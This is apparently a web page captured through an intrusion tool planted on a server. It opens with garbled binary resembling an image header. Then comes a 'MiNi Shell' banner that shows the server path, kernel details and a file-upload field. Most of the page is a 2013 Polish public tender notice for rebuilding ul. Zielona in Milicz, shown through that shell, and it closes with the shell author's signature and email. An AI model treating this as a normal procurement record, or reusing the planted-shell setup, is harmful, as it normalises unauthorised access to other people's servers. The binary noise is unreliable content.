JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131128/488400-N-2013.html

<p class="kh_header"><b>Milicz: Przebudowa ul. Zielonej w Miliczu</b><br>
<b>Numer ogłoszenia: 488400 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milicz , ul. Trzebnicka 2, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840004 w. 314, faks 071 3841119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Zielonej w Miliczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES ZADANIA:
OGÓLNA CHARAKTERYSTYKA ROBÓT:
Opracowanie obejmuje:
1. budowę nawierzchni ulicy, chodników i parkingów,
2. budowę sieci wodociągowej z przebudową przyłączy,
3. przebudowę sieci kanalizacji deszczowej z budową przyłączy
w ulicy Zielonej w Miliczu.
ROBOTY POMIAROWE
ROBOTY ZIEMNE I ROZBIÓRKOWE
Roboty ziemne ograniczają się do robót rozbiórkowych (chodnik z płytek betonowych
i krawężnik kamienny) i robót korytowych. 

WIELKOŚCI ROBÓT:
1. Roboty rozbiórkowe istniejących elem. nawierzchni
istniejący krawężnik kamienny 20×30cm - ok. 85,0 mb
istniejący chodnik z płytek betonowych - ok., 150,0 m2
2. Wykopy korytowe w gruncie
pod jezdnię ulicy,  placów i chodniki - ok. 2660 m3
Gruz oraz urobek z korytowania  wywieźć poza teren budowy w miejsce wskazane przez Inwestora - na odl. do 3km.
CZĘŚĆ DROGOWA
Lokalizacja inwestycji
ul. Zielona jest droga klasy D, kategoria ruchu KR-1, prędkość projektowana 30 km na godz.
Rozwiązanie sytuacyjne:
Cały odcinek ulicy Zielonej projektuje sie szerokości 6,00 m, jako jezdnie dwupasmowa. Na całej długości ulicy po jej stronie południowej projektuje sie chodnik szerokości 1,0 i 1,5 m. Po tej stronie ulicy projektuje się trzy zespoły parkingów dla samochodów osobowych szerokości 4,5 m, jeden z 7 stanowiskami postojowymi w tym 2 stanowiska dla osób niepełnosprawnych, drugi z 5 stanowiskami w tym 2 dla osób niepełnosprawnych oraz trzeci z 12 stanowiskami w tym 2 dla osób niepełnosprawnych. Po północnej stronie ulicy, na odcinku ogródków działkowych, projektuje się chodnik o minimalnej szerokości 0,60 m do 1,00 m (na taka szerokość pozwala pas drogowy). Po tej stronie ulicy, na pozostałym odcinku, projektuje się chodnik szerokości 1,50 m. Również, po
tej stronie ulicy na całej długości, gdzie jest to możliwe projektuje się parkingi równoległe do jezdni dla samochodów ciężarowych o szerokości 3,00 m.
a)JEZDNIA ULICY ZIELONEJ
Konstrukcja nawierzchni:
- warstwa ścieralna z betonu asfaltowego grub. 5 cm;
- podbudowa zasadnicza z betonu asfaltowego grub. 9 cm;
- warstwa tłucznia kamiennego 31,5 przez 63 mm zamkniętego klińcem, grub. 25 cm;
- warstwa odcinająca (odsączająca) z piasku, grub. 15 cm.
Łączna grubość konstrukcji nawierzchni H konstr. = 54 cm. - pow. =3341 m2
-krawężnik betonowy 15x30 cm (od strony zewnętrznej), prefabrykowany, ułożony na ławie betonowej 10x40 cm z oporem, z betonu C15. - L=  1121 mb
Ściek uliczny:
- pasy z kostki kamiennej 15 przez 17 cm na betonie -  168 m2
b). PLACE POSTOJOWE DLA SAMOCHODÓW CIEŻAROWYCH.
Konstrukcja nawierzchni:
-kostka betonowa grubości 8cm;
-podsypka piaskowo-cementowa, grub. 3 cm;
-podbudowa z betonu C16 przez 20, grub. 22 cm;
-warstwa odcinająca (odsączająca) z piasku, grub. 15 cm;
-krawężnik betonowy 15x30 cm (od strony zewnętrznej), prefabrykowany, ułożony na ławie betonowej 10x30 cm z oporem, z betonu C15 - L=  277 mb
Łączna grubość konstrukcji nawierzchni H konstr. = 48cm. - pow.= 768 m2
c) PLACE POSTOJOWE DLA SAMOCHODÓW OSOBOWYCH.
Konstrukcja nawierzchni:
- kostka betonowa typu domino, koloru szarego, grub. 8cm;
- warstwa wyrównawcza z piasku, grub. 3 cm;
- warstwa tłucznia kamiennego 31,5 przez 63 mm zamkniętego klińcem, grub. 25 cm;
- warstwa odcinająca (odsączająca) z piasku, grub. 15 cm;
- krawężnik betonowy 15x30 cm (od strony zewnętrznej), prefabrykowany, ułożony na ławie betonowej 10x30 cm z oporem, z betonu C15. - L= 107 mb
Łączna grubość konstrukcji nawierzchni H konstr. = 51 cm. - pow.= 332 m2
d) CHODNIKI
Konstrukcja nawierzchni:
- kostka betonowa typu domino, koloru czerwonego, grub. 8cm;
- podsypka cementowo-piaskowa grub. 7 cm;
- obrzeże betonowe 8x30 cm prefabrykowane, (od strony zewnętrznej). - L= 1071 mb,
Łączna grubość nawierzchni 15 cm. - pow.= 986m2

CZĘŚĆ SANITARNA

SIEĆ WODOCIĄGOWA I PRZYŁĄCZA
Zasilanie - podłączenie do sieci istniejących w ulicach: Dąbrowskiego i Osadniczej.
Zgodnie z warunkami technicznymi wydanymi przez Zakład Gospodarki Komunalnej w Miliczu, wpięcie projektowanej sieci wodociągowej zaprojektowano przez :
-Wpięcie do istniejącej sieci wodociągowej dn150 wykonanej z żeliwa w ulicy Dąbrowskiego ,
- Wpięcie do sieci wodociągowej dn 110 PEHD w ulicy Osadniczej,
Opracowanie obejmuje dodatkowo przepięcie istniejących przyłączy i budowie nowych.
Projektowane przyłącza obejmują odcinki od sieci do studni wodomierzowych zlokalizowanych na działkach, w odległości około 1,5m od granicy działek.
- 1200 przez 2000 - 3 kpl.
- 1200 z kręgów - 7 kpl.,
Siec wodociągowa należy wykonać z rur PEHD , SDR 17, PE / 100 cali PN 10.
Przewody wodociągowe łączone metoda zgrzewania doczołowego .
- rozdzielcza sieć wodociągowa z rur ciśnieniowych PE-HD PN10 dn. 160mm, - L=460,0m,
- przyłącza wodociągowe -z rur PE-HD PN 10 dn. 40, 50, 90, 110mm - 12 szt.
dn40mm - 38,5m
dn50mm  - 58,0m
dn90mm - 10,0m
- Zaprojektowano hydranty nadziemne dn. 80mm - 5 kpl
SIEĆ KANALIZACJI DESZCZOWEJ
W ulicy zielonej istnieje czynna sieć kanalizacji deszczowej o średnicy 400mm z istniejącymi wyprowadzeniami ze studni rewizyjnych i studni ślepych. Sieć włączona jest do kanału dn1000mm w ul. Dąbrowskiego.
Projektuje się wykonanie wpustów ulicznych, w związku z proj . nawierzchnia ulicy.
Zgodnie z warunkami wydanymi przez ZGK w Miliczu , zaprojektowane wpusty uliczne z przykanalikami  będą  włączone do istniejącej sieci kanalizacji deszczowej.
Projekt obejmuje dodatkowo odejścia kanalizacji deszczowej w stronę działek budowlanych poza obręb projektowanych utwardzeń, dla odbioru wód opadowych z posesji przylegających do ulicy Zielonej.
Włączenia projektowanych przykanalików należy wykonać:
- do istniejących studni rewizyjnych,
- do istniejących studni ślepych,
- przez wbudowanie nowych studni ślepych lub za pomocą połączeń siodłowych.
Część przykanalików istniejących zostanie wykorzystana do połączenia wpustów a dla części zostaną wykonane nowe włączenia do istniejącej sieci.
Dodatkowo zaprojektowano przebudowę istniejącego odcinka kanalizacji deszczowej włączonego do ulicy Osadniczej (odcinek od działki nr 1 / 5).
Zaprojektowano wymianie istniejącego kanału o średnicy 200mm na kanał dn300mm oraz budowę dodatkowej studni rewizyjnej do włączenia projektowanych wpustów ulicznych.
materiały do budowy sieci i przyłączy
-siec kanalizacyjna (przebudowa), 
- z rur betonowych wirowanych , łączonych na uszczelki gumowe Dw300x50mm,
-przyłącza kanalizacyjne - z rur PVC klasy S (SDR34, SN8) ze ścianką litą spełniające wymagania PN-EN 1401:1999, o średnicy zewnętrznej Dz200x5,9mm, uszczelnianych za pomocą uszczelek elastomerowych,
-studzienki ściekowe - z prefabrykowanych kręgów betowych fi 500mm z osadnikiem z betonu min. B45 wodoodpornego i mrozoodpornego.
ZESTAWIENIE DŁUGOŚCI - SIEC KANALIZACJI DESZCZOWEJ
Przebudowywany odcinek sieci dn300mm - L=79,5m
Projektowane przyłącza: 26 szt.
WYKONANIE DOKUMENTACJI POWYKONAWCZEJ GEODEZYJNEJ - 3 KPL.
DOCELOWA ORGANIZACJA RUCHU 
- znaki podłużne (linie segregacyjne i krawędziowe),
- znaki poprzeczne (linie zatrzymania i przejścia dla pieszych), 
łącznie ok. 95 m2
- znaki pionowe - 13 kpl.
Zaprojektowane znaki powinny być wykonane z folii odblaskowej II generacji.
Wielkość znaków: średnie.
Szczegółowy zakres przedmiotu zamówienia jest zgodny z dokumentacją projektową i Specyfikacja Techniczną Wykonania i Odbioru Robót opracowanymi  przez Danutę Puchalską i Zbigniewa Wiktorowskiego prowadzącymi  działalność pod nazwą: Biuro Projektowe CERPRO Zespół projektowy S.C., ul. Międzyleska 6A, 50-514 Wrocław,  składającymi się na Załącznik nr 10 do Specyfikacji.  Załączone przedmiary - wchodzące w skład Załącznika Nr 10 do Specyfikacji są materiałem pomocniczym przy ustaleniu wartości ryczałtowej przedmiotowego zadania (wynagrodzenie ryczałtowe obejmuje wszystkie koszty związane z realizacją pełnego przedmiotu zamówienia, w tym ryzyko Wykonawcy z tytułu wszelkich kosztów związanych z realizacją przedmiotu umowy, a także oddziaływania innych czynników mających lub mogących mieć wpływ na koszty. Niedoszacowanie, pominięcie lub brak rozpoznania zakresu umowy przez Wykonawcę nie może być podstawą do żądania zmiany wynagrodzenia ryczałtowego). Przedmiary robót, wchodzące w skład Załącznika Nr 10 do Specyfikacji, określają wyłącznie zakres i wielkość zadania i nie stanowią podstawy do sporządzenia kosztorysu ofertowego. Kosztorys ofertowy nie jest wymagany. Dokładne dane, niezbędne do wyceny ww. zadania i obliczenia ceny należy określić na podstawie dokumentacji projektowej oraz wizji lokalnej, przeprowadzonej samodzielnie na miejscu budowy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego możliwość udzielenia zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.23.24.60-4, 45.23.21.00-3, 45.23.13.00-8, 45.23.31.00-0, 45.23.32.20-7, 45.11.10.00-8, 45.31.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
15.000,00 zł, słownie: piętnaście tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że wykonali w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie) co najmniej dwie roboty budowlane związane z budową lub przebudową dróg utwardzonych kostką betonową o wartości  co najmniej 500.000,00 zł każda z robót.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż dysponują osobami z niezbędnymi uprawnieniami, w tym przynajmniej:
-  jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w branży drogowej (kierownik budowy) bez ograniczeń,
- jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych (kierownik robót).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I.Wraz z ofertą składane są następujące dokumenty i załączniki:
1) wypełniony i podpisany formularz ofertowy wg wzoru z Załącznika nr 1 do Specyfikacji,
1A) w przypadku, gdy podmiot należy do grupy kapitałowej składa wraz z ofertą listę podmiotów należących do tej samej grupy kapitałowej - wg wzoru z Załącznika nr 11 do Specyfikacji ; 
2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 roku Prawo zamówień publicznych wg wzoru stanowiącego Załącznik nr 2 do Specyfikacji.
II. Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów:
1) Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu i zawarcia umowy; dokument pełnomocnictwa sporządzony zgodnie z przepisami prawa, winien być dołączony do oferty;
2) oferta winna być podpisana przez każdego uczestnika konsorcjum lub ustanowionego pełnomocnika;
3) oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w punkcie III.4.2) niniejszego ogłoszenia (aktualny odpis z właściwego rejestru i oświadczenie o braku podstaw do wykluczenia) dla każdego uczestnika konsorcjum z osobna, pozostałe zaś składane są wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian do umowy na podstawie art. 144 ust. 1 ustawy  z dnia 29 stycznia 2004 roku Prawo zamówień publicznych w następujących przypadkach:
a.wystąpienia siły wyższej rozumianej jako okoliczności, które zaistniały niezależnie od Wykonawcy, bądź Zamawiającego, a których Strony przy dołożeniu należytej staranności nie mogły w dniu podpisywania Umowy przewidzieć ani im (również po tym dniu) zapobiec, a w tym:
- katastrofy naturalne,
- nadzwyczajne zjawiska atmosferyczne utrzymujące się nie krócej niż 5 dni,
- zamieszki społeczne,
- konieczność wykonania prac archeologicznych, 
- sprzeczne z przepisami działania osób trzecich. 
w razie wystąpienia siły wyższej strony będą mogły zmienić termin realizacji zamówienia poprzez jego wydłużenie o czas, w jakim trwała siła wyższa;
b.w razie zaprzestania produkcji  wskazanych przez Zamawiającego do realizacji zamówienia materiałów, w przypadku określonym w  § 11 pkt 2 Umowy (Załącznik Nr  10 do Specyfikacji) - poprzez zastąpienie ich innymi;  
c.zmiany stawki podatku od towarów i usług (VAT) na usługi określone w przedmiocie zamówienia, poprzez dostosowanie stawki podatku VAT do stawki wynikającej ze zmienionych przepisów prawa, a tym samym dokonanie zmiany wynagrodzenia umownego brutto;
d.zmiany kluczowego personelu Wykonawcy i Zamawiającego - w szczególności osób nadzorujących prowadzenie prac - poprzez wskazanie nowych osób będących kluczowym personelem Wykonawcy i Zamawiającego;
e.zmiany w zakresie powierzenia podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy.
2.Strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmiany do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz.pl lub Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 58, w cenie: 15,00 zł, na wniosek oferenta zgodnie z art. 42 ust. 2 Pzp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2013 godzina 10:00, miejsce: Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 15 (Punkt Obsługi Mieszkańców), otwarcie ofert: 13.12.2013, godz. 10:30, sala nr 4 (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com